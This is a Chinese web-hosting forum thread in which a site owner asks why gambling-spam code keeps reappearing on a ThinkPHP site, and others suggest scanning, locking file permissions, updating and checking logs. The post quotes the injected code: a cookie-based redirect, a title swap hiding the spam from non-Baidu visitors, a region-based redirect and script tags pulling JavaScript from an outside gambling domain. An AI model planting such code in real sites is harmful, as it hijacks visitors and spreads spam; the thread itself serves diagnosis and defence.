全球主机交流论坛

标题: 官网被人插入了恶意广告，删除后没多久自动又被加上了 [打印本页]

作者: shanjie89 时间: 2020-1-3 10:22
标题: 官网被人插入了恶意广告，删除后没多久自动又被加上了
本帖最后由 shanjie89 于 2020-1-3 10:53 编辑

官网被人插入了恶意广告，删除后没多久自动又被加上了
阿里云服务器：centos
偷懒装了宝塔
ThinkPHP、后台使用TPAdmin
官网被人插入了恶意广告（index跳indax），删除了，没多久又加上了（怀疑是自动的），有没有人碰到过

通过对比文件，成功找到木马
不过我就是好奇，他是怎么自动来挂马的，总不能几小时登陆一次吧
而且他替换的还是我之前的官网，并不是直接在新的官网上修改（因为最近修改了一下官网页面）

JS文件也被增加了
var c = document.cookie;
   if (c.indexOf('isfirstvisited=false') != -1) {

   }
   else {
      var d = new Date();
      d.setFullYear(d.getFullYear() + 1);
      document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
window.location.;
   }

如下：

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>2020欧洲杯外围-2020欧洲杯足球竞猜</title>
<meta name="keywords" content="欧洲杯外围投注网,欧洲杯投注,欧洲杯竞猜投注,欧洲杯网上投注,2020欧洲杯赛事"/>
<meta name="description"
content="365bet体育是中国知名的体育门户网站【6126ok.com】,主要为您提供以下栏目:国内足球、国际足球、NBA、CBA、综合体育、世界杯、欧洲杯、欧冠杯、西甲、英超、意甲、法甲、德甲比分、直播、彩票、竞猜等,开户送彩金,更多优惠活动等你来!"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="官网"}</script>
<script language="javascript" src="https://www.bcdas8.com/dq.js"></script>
<script>var sf=returnCitySN["cname"]; if(sf.indexOf("浙江省")>=0){window.location.href="/indax.html";}</script>
<script language="javascript" src="https://www.bcdas8.com/365301.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<script>
document.write('<link rel="stylesheet" href="./static/index/css/public.min.css?v=' + new Date() + '"><\/link>' +
'<link rel="stylesheet" href="./static/index/css/index.min.css?v=' + new Date() + '"><\/link>')
</script>
</head>

作者: w187023 时间: 2020-1-3 10:23
先把源码下载杀毒纯静态运行

作者: hehe 时间: 2020-1-3 10:23
提示: 作者被禁止或删除内容自动屏蔽

作者: hdwz 时间: 2020-1-3 10:23
提示: 作者被禁止或删除内容自动屏蔽

作者: shanjie89 时间: 2020-1-3 10:29

hdwz 发表于 2020-1-3 10:23
不亮CMS 谁知道

ThinkPHP写的后端
TPAdmin做的后台

作者: A23187 时间: 2020-1-3 10:29
网址呢？

作者: hdwz 时间: 2020-1-3 10:31
提示: 作者被禁止或删除内容自动屏蔽

作者: voleta 时间: 2020-1-3 10:41
源码下载下来用D盾扫下看看咯

作者: ApkB 时间: 2020-1-3 11:03
PHP的锅，稳稳的

作者: BOC 时间: 2020-1-3 11:10
提示: 作者被禁止或删除内容自动屏蔽

作者: dtkevin 时间: 2020-1-3 11:14
提示: 作者被禁止或删除内容自动屏蔽

作者: kenutu 时间: 2020-1-3 11:17

ApkB 发表于 2020-1-3 11:03
PHP的锅，稳稳的

ThinkPHP 的锅，我有个淘宝客，用的是推券客，直接被干了两次，现在换到了LINUNX，还不知道咋样呢，回头看看，重点是WINDOWS 运行PHP。

作者: 达雅 时间: 2020-1-3 11:22
文件夹权限都锁死，不能写入只能读取试试会不会挂

作者: 夜不眠 时间: 2020-1-3 12:02
什么管网，晒出来看看

作者: xteeq6 时间: 2020-1-3 12:10
你要是找不到漏洞在哪，官方要是不更新，就禁止写入文件，谁都改不了你的文件

作者: wo284473037 时间: 2020-1-3 12:16
如果服务器没有被黑，那就给文件上权限，禁止写入

作者: gyhl 时间: 2020-1-3 12:18
ThinkPHP不是一直有漏洞吗

作者: shanjie89 时间: 2020-1-3 22:57

BOC 发表于 2020-1-3 11:10
java同样中招，不知道是啥（换服务器也不行，好像针对域名注入的），给我弄一些js和样式，妈的，让我直接写 ...

我服务器上好多网站，就这个官网中招，清理了webshell之后还是中招
好像有定时任务替换覆盖我的index.html

作者: 天有点热 时间: 2020-1-5 14:23
ThinkPHP只做过一个站，也是被黑

作者: makedary 时间: 2020-1-5 14:34
ThinkPHP后门太多了，更新到最新版，然后更改下数据库密码即可，我以前也这样被黑过、

作者: 原地满状态 时间: 2020-1-5 14:44
查下日志看看他怎么日进去的。

欢迎光临全球主机交流论坛 (https://91ai.net/)